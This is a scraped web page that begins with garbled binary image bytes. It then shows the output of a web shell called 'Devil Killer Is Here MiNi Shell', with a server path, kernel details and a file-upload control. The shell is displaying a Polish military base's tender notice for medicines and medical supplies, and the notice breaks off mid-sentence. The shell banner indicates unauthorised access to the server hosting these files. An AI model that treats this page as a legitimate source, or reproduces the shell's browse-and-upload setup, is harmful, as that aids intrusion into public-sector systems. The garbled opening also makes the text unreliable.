JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240510/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240510/0031911901-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> „DOSTAWA LEKÓW, MATERIAŁÓW MEDYCZNYCH ORAZ DROBNEGO SPRZĘTU MEDYCZNEGO&#34; </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">31 BAZA LOTNICTWA TAKTYCZNEGO W POZNANIU-KRZESINACH</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 632431771</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Silniki 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Poznań</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">61-325</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL415 - Miasto Poznań</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">261 548 500</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">31blt.przetargi@ron.mil.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://31blt.wp.mil.pl/pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Obrona</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „DOSTAWA LEKÓW, MATERIAŁÓW MEDYCZNYCH ORAZ DROBNEGO SPRZĘTU MEDYCZNEGO&#34; </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ca86c861-0ea8-11ef-9381-e6cc5d6d04e5</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00319119</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-05-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00236246/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.3 Dostawa leków i materiałów medycznych na 2024</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://portal.smartpzp.pl/31blt/public/postepowanie?postepowanie=67200288 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://portal.smartpzp.pl/31blt/public/postepowanie?postepowanie=67200288</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W postępowaniu o udzielenie<br/>zamówienia komunikacja Wykonawcy z Zamawiającym, a w szczególności składanie oświadczeń, wniosków, zawiadomień oraz<br/>przekazywanie informacji, odbywa się elektronicznie za pośrednictwem posiadanego w Systemie SmartPzp konta Użytkownika<br/>Zewnętrznego tj. użytkownika Wykonawcy, przy czym ofertę wraz z załącznikami należy złożyć za pośrednictwem zakładki „Oferty”<br/>dostępnej na https://portal.smartpzp.pl/31blt w miejscu publikacji ogłoszenia o zamówieniu i SWZ. Natomiast zadawanie pytań przez<br/>Wykonawców odbywa się w zakładce „Pytania do postępowania”. Po otwarciu ofert, komunikacja między Zamawiającym a<br/>Wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane są elektronicznie za<br/>pośrednictwem Systemu, w zakładce „Korespondencja”, która dla Wykonawcy jest widoczna w Zakładce „Oferty”, po zaznaczeniu<br/>numeru złożonej oferty.<br/>Oferta i oświadczenie, o którym mowa w art. 125 ust. 1 ustawy pzp, a także inne dokumenty składane wraz z ofertą składa się, pod<br/>rygorem nieważności, podpisane:<br/>- kwalifikowanym podpisem elektronicznym lub<br/>- elektronicznym podpisem zaufanym lub<br/>- elektronicznym podpisem osobistym</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">rozdział XXI SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP 24/IV/24</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">8</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> zakup i dostawa produktów leczniczych dla 31 BLT i jednostek wojskowych będących na zaopatrzeniu Minimalny termin ważności określono w załączniku nr 4 do SWZ – formularz cenowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33600000-6 - Produkty farmaceutyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1.	Zamawiający przewiduje prawo opcji, do 90% wysokości kwoty brutto umowy. Wykorzystanie prawa opcji będzie uzależnione od rzeczywistych potrzeb Zamawiającego i jest wszczynane na podstawie pisemnego oświadczenia woli Zamawiającego, a Wykonawca będzie zobowiązany podjąć się jej realizacji w ramach przedmiotowej umowy. Realizowanie opcji będzie odbywało się w oparciu o ceny jednostkowe zawarte w formularzu cenowym (załącznik nr 1 do umowy). Zamówienie w ramach opcji będzie realizowane na tych samych warunkach co zamówienie podstawowe. Wykonawcy będzie przysługiwało odrębne wynagrodzenie za dostawy w ramach prawa opcji. <br/>2.	Rozszerzenie zamówienia w ramach opcji będzie realizowane w terminie do 30.11.2024 r. Zamawiający może skorzystać z uruchomienia prawa opcji najpóźniej w terminie do dnia 31.10.2024 r.<br/>3.	Zamawiający zastrzega, że część zamówienia określona jako prawo opcji jest uprawnieniem, a nie zobowiązaniem Zamawiającego. Realizacja opcji może, ale nie musi nastąpić, w zależności od zapotrzebowania Zamawiającego i na skutek jego dyspozycji w tym zakresie. Brak realizacji zamówienia w tym zakresie nie może rodzić żadnych roszczeń ze strony Wykonawcy w stosunku do Zamawiającego. <br/>4.	W przypadku uruchomienia prawa opcji Zamawiający dopuszcza jednorazową waloryzację cen/y jednostkowych/ej netto według wskaźnika cen usług opublikowanego w komunikacie Prezesa GUS. <br/>5.	Waloryzacja o której mowa w ust. 4 jest dopuszczalna w razie łącznego spełnienia następujących warunków:<br/>a)	złożenia pisemnego wniosku przez Wykonawcę wraz z dokumentem wskazanym w ust. 4, zawierającym wskaźniki cenowe oraz dokumentami potwierdzającymi wzrost cen i kosztów,<br/>b)	upływu co najmniej 6 miesięcy od dnia obowiązywania umowy,<br/>c)	zmiany wskaźnika o co najmniej 12% w stosunku do cen/y wskazanych/ej w załączniku nr 2 do umowy.<br/>7.	Waloryzację przeprowadza się w oparciu o otrzymane w formie pisemnej wskaźniki cen (o których mowa w ust. 5) za kwartał poprzedzający złożenie wniosku, o którym mowa w ust. 5 pkt a), w odniesieniu do cen wskazanych w załączniku nr 1 do umowy. <br/>8.	Maksymalna wartość zmiany wysokości wynagrodzenia jaką dopuszcza Zamawiający na podstawie zasad określonych w § 8 ust. 5, wynosi 20 % względem wysokości wynagrodzenia Wykonawcy wskazanego w § 2 ust. 1.<br/>9.	Zgodnie z art. 439 ust.5 uPzp Wykonawca którego wynagrodzenie zostanie zmienione zgodnie z ust. 5 zobowiązany jest do zmiany wynagrodzenia przysługującego podwykonawcy, z którym zawarł umowę, w zakresie odpowiadającym zmianom cen materiałów lub kosztów dotyczących zobowiązania podwykonawcy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> zakup i dostawa materiałów medycznych na użytek bieżący dla 31 BLT i jednostek wojskowych będących na zaopatrzeniu. Minimalny termin ważności określono w załączniku nr 4 do SWZ – formularz cenowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33600000-6 - Produkty farmaceutyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1.	Zamawiający przewiduje prawo opcji, do 90% wysokości kwoty brutto umowy. Wykorzystanie prawa opcji będzie uzależnione od rzeczywistych potrzeb Zamawiającego i jest wszczynane na podstawie pisemnego oświadczenia woli Zamawiającego, a Wykonawca będzie zobowiązany podjąć się jej realizacji w ramach przedmiotowej umowy. Realizowanie opcji będzie odbywało się w oparciu o ceny jednostkowe zawarte w formularzu cenowym (załącznik nr 1 do umowy). Zamówienie w ramach opcji będzie realizowane na tych samych warunkach co zamówienie podstawowe. Wykonawcy będzie przysługiwało odrębne wynagrodzenie za dostawy w ramach prawa opcji. <br/>2.	Rozszerzenie zamówienia w ramach opcji będzie realizowane w terminie do 30.11.2024 r. Zamawiający może skorzystać z uruchomienia prawa opcji najpóźniej w terminie do dnia 31.10.2024 r.<br/>3.	Zamawiający zastrzega, że część zamówienia określona jako prawo opcji jest uprawnieniem, a nie zobowiązaniem Zamawiającego. Realizacja opcji może, ale nie musi nastąpić, w zależności od zapotrzebowania Zamawiającego i na skutek jego dyspozycji w tym zakresie. Brak realizacji zamówienia w tym zakresie nie może rodzić żadnych roszczeń ze strony Wykonawcy w stosunku do Zamawiającego. <br/>4.	W przypadku uruchomienia prawa opcji Zamawiający dopuszcza jednorazową waloryzację cen/y jednostkowych/ej netto według wskaźnika cen usług opublikowanego w komunikacie Prezesa GUS. <br/>5.	Waloryzacja o której mowa w ust. 4 jest dopuszczalna w razie łącznego spełnienia następujących warunków:<br/>a)	złożenia pisemnego wniosku przez Wykonawcę wraz z dokumentem wskazanym w ust. 4, zawierającym wskaźniki cenowe oraz dokumentami potwierdzającymi wzrost cen i kosztów,<br/>b)	upływu co najmniej 6 miesięcy od dnia obowiązywania umowy,<br/>c)	zmiany wskaźnika o co najmniej 12% w stosunku do cen/y wskazanych/ej w załączniku nr 2 do umowy.<br/>7.	Waloryzację przeprowadza się w oparciu o otrzymane w formie pisemnej wskaźniki cen (o których mowa w ust. 5) za kwartał poprzedzający złożenie wniosku, o którym mowa w ust. 5 pkt a), w odniesieniu do cen wskazanych w załączniku nr 1 do umowy. <br/>8.	Maksymalna wartość zmiany wysokości wynagrodzenia jaką dopuszcza Zamawiający na podstawie zasad określonych w § 8 ust. 5, wynosi 20 % względem wysokości wynagrodzenia Wykonawcy wskazanego w § 2 ust. 1.<br/>9.	Zgodnie z art. 439 ust.5 uPzp Wykonawca którego wynagrodzenie zostanie zmienione zgodnie z ust. 5 zobowiązany jest do zmiany wynagrodzenia przysługującego podwykonawcy, z którym zawarł umowę, w zakresie odpowiadającym zmianom cen materiałów lub kosztów dotyczących zobowiązania podwykonawcy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> zakup i dostawa materiałów medycznych w celu ukompletowania IPMed, torby lekarza, plecaka ratownika i ewakuacji medycznej dla 31 BLT i jednostek wojskowych będących na zaopatrzeniu. Minimalny termin ważności określono w załączniku nr 4 do SWZ – formularz cenowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33600000-6 - Produkty farmaceutyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1.	Zamawiający przewiduje prawo opcji, do 90% wysokości kwoty brutto umowy. Wykorzystanie prawa opcji będzie uzależnione od rzeczywistych potrzeb Zamawiającego i jest wszczynane na podstawie pisemnego oświadczenia woli Zamawiającego, a Wykonawca będzie zobowiązany podjąć się jej realizacji w ramach przedmiotowej umowy. Realizowanie opcji będzie odbywało się w oparciu o ceny jednostkowe zawarte w formularzu cenowym (załącznik nr 1 do umowy). Zamówienie w ramach opcji będzie realizowane na tych samych warunkach co zamówienie podstawowe. Wykonawcy będzie przysługiwało odrębne wynagrodzenie za dostawy w ramach prawa opcji. <br/>2.	Rozszerzenie zamówienia w ramach opcji będzie realizowane w terminie do 30.11.2024 r. Zamawiający może skorzystać z uruchomienia prawa opcji najpóźniej w terminie do dnia 31.10.2024 r.<br/>3.	Zamawiający zastrzega, że część zamówienia określona jako prawo opcji jest uprawnieniem, a nie zobowiązaniem Zamawiającego. Realizacja opcji może, ale nie musi nastąpić, w zależności od zapotrzebowania Zamawiającego i na skutek jego dyspozycji w tym zakresie. Brak realizacji zamówienia w tym zakresie nie może rodzić żadnych roszczeń ze strony Wykonawcy w stosunku do Zamawiającego. <br/>4.	W przypadku uruchomienia prawa opcji Zamawiający dopuszcza jednorazową waloryzację cen/y jednostkowych/ej netto według wskaźnika cen usług opublikowanego w komunikacie Prezesa GUS. <br/>5.	Waloryzacja o której mowa w ust. 4 jest dopuszczalna w razie łącznego spełnienia następujących warunków:<br/>a)	złożenia pisemnego wniosku przez Wykonawcę wraz z dokumentem wskazanym w ust. 4, zawierającym wskaźniki cenowe oraz dokumentami potwierdzającymi wzrost cen i kosztów,<br/>b)	upływu co najmniej 6 miesięcy od dnia obowiązywania umowy,<br/>c)	zmiany wskaźnika o co najmniej 12% w stosunku do cen/y wskazanych/ej w załączniku nr 2 do umowy.<br/>7.	Waloryzację przeprowadza się w oparciu o otrzymane w formie pisemnej wskaźniki cen (o których mowa w ust. 5) za kwartał poprzedzający złożenie wniosku, o którym mowa w ust. 5 pkt a), w odniesieniu do cen wskazanych w załączniku nr 1 do umowy. <br/>8.	Maksymalna wartość zmiany wysokości wynagrodzenia jaką dopuszcza Zamawiający na podstawie zasad określonych w § 8 ust. 5, wynosi 20 % względem wysokości wynagrodzenia Wykonawcy wskazanego w § 2 ust. 1.<br/>9.	Zgodnie z art. 439 ust.5 uPzp Wykonawca którego wynagrodzenie zostanie zmienione zgodnie z ust. 5 zobowiązany jest do zmiany wynagrodzenia przysługującego podwykonawcy, z którym zawarł umowę, w zakresie odpowiadającym zmianom cen materiałów lub kosztów dotyczących zobowiązania podwykonawcy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> zakup i dostawa materiałów diagnostycznych w celu wyposażenia pracowni psychologicznej WCR </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33156000-8 - Przyrządy do testów psychologicznych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1.	Zamawiający przewiduje prawo opcji, do 90% wysokości kwoty brutto umowy. Wykorzystanie prawa opcji będzie uzależnione od rzeczywistych potrzeb Zamawiającego i jest wszczynane na podstawie pisemnego oświadczenia woli Zamawiającego, a Wykonawca będzie zobowiązany podjąć się jej realizacji w ramach przedmiotowej umowy. Realizowanie opcji będzie odbywało się w oparciu o ceny jednostkowe zawarte w formularzu cenowym (załącznik nr 1 do umowy). Zamówienie w ramach opcji będzie realizowane na tych samych warunkach co zamówienie podstawowe. Wykonawcy będzie przysługiwało odrębne wynagrodzenie za dostawy w ramach prawa opcji. <br/>2.	Rozszerzenie zamówienia w ramach opcji będzie realizowane w terminie do 30.11.2024 r. Zamawiający może skorzystać z uruchomienia prawa opcji najpóźniej w terminie do dnia 31.10.2024 r.<br/>3.	Zamawiający zastrzega, że część zamówienia określona jako prawo opcji jest uprawnieniem, a nie zobowiązaniem Zamawiającego. Realizacja opcji może, ale nie musi nastąpić, w zależności od zapotrzebowania Zamawiającego i na skutek jego dyspozycji w tym zakresie. Brak realizacji zamówienia w tym zakresie nie może rodzić żadnych roszczeń ze strony Wykonawcy w stosunku do Zamawiającego. <br/>4.	W przypadku uruchomienia prawa opcji Zamawiający dopuszcza jednorazową waloryzację cen/y jednostkowych/ej netto według wskaźnika cen usług opublikowanego w komunikacie Prezesa GUS. <br/>5.	Waloryzacja o której mowa w ust. 4 jest dopuszczalna w razie łącznego spełnienia następujących warunków:<br/>a)	złożenia pisemnego wniosku przez Wykonawcę wraz z dokumentem wskazanym w ust. 4, zawierającym wskaźniki cenowe oraz dokumentami potwierdzającymi wzrost cen i kosztów,<br/>b)	upływu co najmniej 6 miesięcy od dnia obowiązywania umowy,<br/>c)	zmiany wskaźnika o co najmniej 12% w stosunku do cen/y wskazanych/ej w załączniku nr 2 do umowy.<br/>7.	Waloryzację przeprowadza się w oparciu o otrzymane w formie pisemnej wskaźniki cen (o których mowa w ust. 5) za kwartał poprzedzający złożenie wniosku, o którym mowa w ust. 5 pkt a), w odniesieniu do cen wskazanych w załączniku nr 1 do umowy. <br/>8.	Maksymalna wartość zmiany wysokości wynagrodzenia jaką dopuszcza Zamawiający na podstawie zasad określonych w § 8 ust. 5, wynosi 20 % względem wysokości wynagrodzenia Wykonawcy wskazanego w § 2 ust. 1.<br/>9.	Zgodnie z art. 439 ust.5 uPzp Wykonawca którego wynagrodzenie zostanie zmienione zgodnie z ust. 5 zobowiązany jest do zmiany wynagrodzenia przysługującego podwykonawcy, z którym zawarł umowę, w zakresie odpowiadającym zmianom cen materiałów lub kosztów dotyczących zobowiązania podwykonawcy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający 